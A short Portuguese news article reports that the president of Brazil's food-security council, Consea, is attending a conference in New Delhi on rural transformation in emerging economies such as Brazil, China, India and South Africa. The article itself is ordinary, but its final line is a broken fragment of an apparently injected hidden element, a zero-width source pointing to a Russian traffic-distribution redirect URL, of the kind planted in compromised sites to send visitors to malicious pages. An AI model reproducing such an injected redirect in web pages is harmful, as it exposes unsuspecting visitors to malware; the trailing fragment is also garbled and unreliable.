Consea participa na Índia de conferência internacional sobre transformações rurais
![](https://enconasa.asabrasil.org.br/wp-content/uploads/2025/02/seguranca-alimentar.JPG-scaled.jpg)
De quarta a sexta-feira (14 a 16) em Nova Déli, na Índia, acontece a Conferência Internacional “As dinâmicas da transformação rural nos países emergentes”, evento que deve reunir 300 participantes, entre eles estarão representantes de países considerados emergentes, como Brasil, China, Índia e África do Sul.
O presidente do Conselho Nacional de Segurança Alimentar e Nutricional, Renato S. Maluf, participa como observador convidado. Ele aproveita a viagem à Índia para se reunir com autoridades indianas das áreas de alimentação e nutrição, conhecer o que vem sendo feito naquele país nesses segmentos e também apresentar as experiências brasileiras.
A conferência tem na sua organização duas instituições brasileiras – o Ministério do Desenvolvimento Agrário (MDA) e o Departamento de Economia da Universidade de São Paulo. O objetivo do evento é “estimular o surgimento de novos quadros, abordagens e estratégias para superar os maiores desafios postos pela dinâmica da transformação rural nas economias emergentes, à luz das tendências nacionais e internacionais”.
Entre os 300 participantes, 70% são provenientes de países emergentes e 30% são de outros países em desenvolvimento. Os participantes, entre expositores e ouvintes, estarão representando as figuras políticas dos grandes países emergentes; os representantes dos governos federais; os governadores das esferas estaduais e municipais; as associações rurais e organizações da sociedade civil; os responsáveis pela gestão de recursos naturais; acadêmicos e representantes dos centros de estudos de políticas; o setor privado, incluindo bancos e associações comerciais; e instituições financeiras internacionais, entre outras agências de desenvolvimento.
Um quarto da população mundial vive nas zonas rurais de Brasil, China, Índia e África do Sul. Os domicílios rurais desses países emergentes têm um papel importante no manejo de milhões de hectares de terras e florestas. Além disso, esses países são alguns dos maiores produtores de alimentos do mundo, sendo importantes para economia global.
Essas áreas concentram um terço da pobreza do mundo, metade de toda a pobreza nas áreas rurais, e vivenciam ainda alguns dos maiores desafios ao desenvolvimento humano. Rápidas transformações econômicas, sociais, demográficas, culturais e políticas estão ocorrendo nas áreas rurais desses quatro países. Tais mudanças nas sociedades rurais são necessárias ou mesmo indispensáveis para o desenvolvimento sustentável não só desses países, mas de todo o mundo.
Informações
http://www.ruraltransformation.in
rc=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ heigh